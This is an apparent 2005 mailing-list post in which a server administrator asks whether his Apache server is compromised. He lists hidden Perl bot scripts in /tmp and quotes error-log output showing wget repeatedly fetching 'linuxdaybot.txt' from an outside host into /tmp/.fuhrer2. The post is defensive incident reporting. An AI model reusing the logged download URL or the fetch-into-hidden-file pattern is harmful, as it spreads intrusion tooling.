Am I Compromised -- Some interesting findings

Ritesh Raj Sarraf Fri, 25 Nov 2005 09:21:50 -0800

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Here's what I found out more digging in the logs.


There are 3 hidden files (attached with this message) in /tmp/:
1) .fuhrer
2) .fuhrer2
3) .fuhrer3

ns1:/var/log/apache2# ls -la /tmp/
total 56
drwxrwxrwt   5 root     root      4096 Nov 25 07:46 .
drwxr-xr-x  26 root     root      4096 Nov 25 04:49 ..
drwxrwxrwt   2 root     root      4096 Nov 21 23:32 .ICE-unix
drwxrwxrwt   2 root     root      4096 Nov 21 23:32 .X11-unix
- -rw-r--r--   1 www-data www-data  3673 Nov 25 00:30 .fuhrer
- -rw-r--r--   1 www-data www-data 18698 Nov 25 06:11 .fuhrer2
- -rw-r--r--   1 www-data www-data     0 Nov 25 08:10 .fuhrer3
- -rw-------   1 www-data www-data    71 Nov 23 03:28
sess_07f541a848d0dd70fc87c3aed1691c87
- -rw-------   1 www-data www-data   864 Nov 23 01:55
sess_8092654d49176bb860dca7fad5f50cce
- -rw-------   1 www-data www-data   342 Nov 22 23:56
sess_e5e56ebacf7fcd31ea42d829e1f1f4fd
drwxrwxrwx   3 www-data www-data  4096 Nov 23 01:28 yappa-ng_cache

All these 3 are perl scripts, so now it is clear that there are the perl
scripts which are running from within apache (I've enabled mod_perl in my
apache installation) and eating up the cpu cycles.

Now let's look a little of /var/log/apache2/error.log:

Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]

    0K .......... ........                                   100%  210.37
KB/s

08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]

- --08:07:40--  http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
           => `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]

    0K .......... ........                                   100%  211.06
KB/s

08:07:40 (211.06 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]

- --08:07:40--  http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
           => `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]

    0K .......... ........                                   100%  210.52
KB/s


The logs show that the guy uploaded the files to /tmp and hid them.

In my first mail, the logs showed a lot of "sh" defunct processes executed
from within apache. Is this an attempt to gain the shell through the web
server ?

Please suggest me what more should I look for and how to tackle this attack.

Regards,

rrs
- -- 
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is
research."
"Necessity is the mother of invention."
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFDhz8I4Rhi6gTxMLwRAji2AJsHUJAgy/uWIqR1kvAm4HYv95LXKQCgo+B+
jvy68vBBG9iP45Ab0+ouAAg=
=7SKs
-----END PGP SIGNATURE-----


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Am I Compromised -- Some interesting findings

Reply via email to